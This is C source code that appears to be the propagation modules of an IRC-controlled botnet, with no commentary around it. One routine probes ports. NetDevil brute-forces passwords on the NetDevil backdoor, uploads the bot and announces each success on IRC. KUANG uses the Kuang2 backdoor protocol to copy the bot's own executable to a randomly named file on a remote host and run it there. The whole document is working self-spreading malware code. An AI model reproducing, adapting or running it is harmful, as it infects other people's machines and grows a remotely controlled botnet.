BOOL AdvPortOpen(unsigned long ip, unsigned int port, unsigned int delay)
{
SOCKADDR_IN sin;
unsigned long blockcmd=1;
SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
if (sock == INVALID_SOCKET)
return FALSE;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = ip;
sin.sin_port = fhtons((unsigned short)port);
fioctlsocket(sock,FIONBIO,&blockcmd);
fconnect(sock,(LPSOCKADDR)&sin,sizeof(sin));
TIMEVAL timeout;
timeout.tv_sec=delay;
timeout.tv_usec=0;
FD_SET rset;
FD_ZERO(&rset);
FD_SET(sock,&rset);
int i = fselect(0,0,&rset,0,&timeout);
fclosesocket(sock);
if (i<=0)
return FALSE;
else
return TRUE;
}
BOOL NetDevil(EXINFO exinfo)
{
char buffer[IRCLINE];
DWORD mode=0;
SOCKET ssock;
if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
return FALSE;
SOCKADDR_IN sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
sin.sin_port = fhtons(exinfo.port);
fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin));
fioctlsocket(ssock,FIONBIO,&mode);
for (int i=0; passwords[i]; i++) {
Sleep(50);
memset(buffer,0,sizeof(buffer));
if (NetDevil_Receive(ssock) == -1)
break;
if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0)
break;
if (strcmp(buffer,"passed") == 0) {
sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]);
fsend(ssock, buffer, strlen(buffer), 0);
if (NetDevil_Upload(exinfo.ip,ssock) == 1) {
fclosesocket(ssock);
_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1])));
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
break;
}
if (strcmp(buffer,"pass_pleaz") == 0) {
memset(buffer,0,sizeof(buffer));
sprintf(buffer,"pass_pleaz%s",passwords[i]);
fsend(ssock,buffer ,strlen(buffer), 0);
continue;
}
else break;
}
fclosesocket(ssock);
return FALSE;
}
// FIX ME: This could probably be (re)moved, its just from the original exploit layout.
int WksSocket(int tm, int port, const char *WksIP) {
unsigned int sock;
unsigned long y = 1;
struct timeval timeout;
struct sockaddr_in target_ip;
if ((sock = fsocket(AF_INET, SOCK_STREAM, 0)) == -1)
return -1;
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = finet_addr(WksIP);
target_ip.sin_port = fhtons(port);
fioctlsocket(sock,FIONBIO,&y);
timeout.tv_sec=tm;
timeout.tv_usec = 0;
if (fconnect(sock, (struct sockaddr *)&target_ip, sizeof(target_ip)) == -1)
{
fd_set writefds;
fd_set exceptfds;
FD_ZERO (&writefds);
FD_ZERO (&exceptfds);
FD_SET (sock, &writefds);
FD_SET (sock, &exceptfds);
fselect(0, NULL, &writefds, &exceptfds, &timeout);
//if (!FDI_ISSET (sock, &writefds))
if (!__fWSAFDIsSet(sock, &writefds))
{
fclosesocket(sock);
return -1;
}
y=0;
fioctlsocket(sock,FIONBIO,&y);
}
return sock;
}
int KUANG(SOCKET sock)
{
HANDLE testfile;
char rBuffer[1024], thisfilename[MAX_PATH], randFile[5], rFile[15];
unsigned int Fsize, move;
int x;
DWORD mode = 0;
memset(rFile,0,sizeof(rFile));
memset(randFile,0,sizeof(randFile));
srand(GetTickCount());
for (x=0;x < 4;x++)
randFile[x] = (char)((rand()%26)+97);
randFile[x+1] = '\0';
sprintf(rFile,"c:\\%s.exe",randFile);
fioctlsocket(sock,FIONBIO,&mode); //set the socket back to blocking
if (KUANG_Reciev(sock) == -1)
goto end;
memset(k2_buffer,0,sizeof(k2_buffer));
GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
testfile = CreateFile(thisfilename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
if (testfile == INVALID_HANDLE_VALUE)
goto end;
Fsize = GetFileSize(testfile,NULL);
k2_msg->command=K2_UPLOAD_FILE;
k2_msg->param=Fsize;
strcpy(k2_msg->sdata,rFile);
//strcpy(k2_msg->bdata,rFile);
//CloseHandle(testfile);
fsend(sock,k2_buffer,1024, 0);
if (KUANG_Reciev(sock) == -1)
goto end;
while (Fsize) {
unsigned int Fsend = 1024;
memset(rBuffer,0,sizeof(rBuffer));
if (Fsend>Fsize)
Fsend=Fsize;
move = 0-Fsize;
SetFilePointer(testfile, move, NULL, FILE_END);
ReadFile(testfile, rBuffer, Fsend, &mode, NULL);
int bytes_sent = fsend(sock, rBuffer, Fsend, 0);
if (bytes_sent == SOCKET_ERROR) {
if (fWSAGetLastError() != WSAEWOULDBLOCK)
break;
else
bytes_sent = 0;
}
Fsize = Fsize - bytes_sent;
}
if (KUANG_Reciev(sock) == -1)
goto end;
if (testfile != INVALID_HANDLE_VALUE)
CloseHandle(testfile);
memset(k2_buffer,0,sizeof(k2_buffer));
k2_msg->command=K2_RUN_FILE;
sprintf(k2_msg->bdata,rFile);
fsend(sock,k2_buffer ,1024, 0);
if (KUANG_Reciev(sock) == -1)
goto end;
memset(k2_buffer,0,sizeof(k2_buffer));
k2_msg->command=K2_QUIT;
fsend(sock,k2_buffer ,4, 0);
return 1;
end:;
fclosesocket(sock);
return 0;
}
